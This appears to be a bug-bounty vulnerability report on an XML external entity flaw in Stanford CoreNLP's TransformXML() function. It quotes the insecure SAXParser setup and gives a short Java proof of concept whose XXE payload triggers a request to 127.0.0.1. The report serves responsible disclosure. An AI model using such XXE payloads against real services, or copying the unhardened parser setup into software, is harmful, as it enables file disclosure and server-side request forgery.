Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp
Valid
Reported on
Jan 11th 2022
Description
The TransformXML() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In
try {
saxParser = SAXParserFactory.newInstance().newSAXParser();
} catch (Exception e) {
log.info("Error configuring XML parser: " + e);
throw new RuntimeException(e);
}
SAXParser is created without FEATURE_SECURE_PROCESSING set, leaving it vulnerable to XXE
Proof of Concept
Extracted out the key function SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser(), to showcase how it can be exploited.
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;
import java.io.ByteArrayInputStream;
public class Poc {
public static void main(String[] args) {
try {
String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
} catch (Exception e) {
e.printStackTrace();
}
}
}
Causes an SSRF to http://127.0.0.1
Impact
This vulnerability is capable of XXE to disclose data / conduct SSRF attacks etc.
We are processing your report and will contact the
stanfordnlp/corenlp
team within 24 hours.
a year ago
haxatron modified the report
a year ago
haxatron modified the report
a year ago
We have contacted a member of the
stanfordnlp/corenlp
team and are waiting to hear back
a year ago
to join this conversation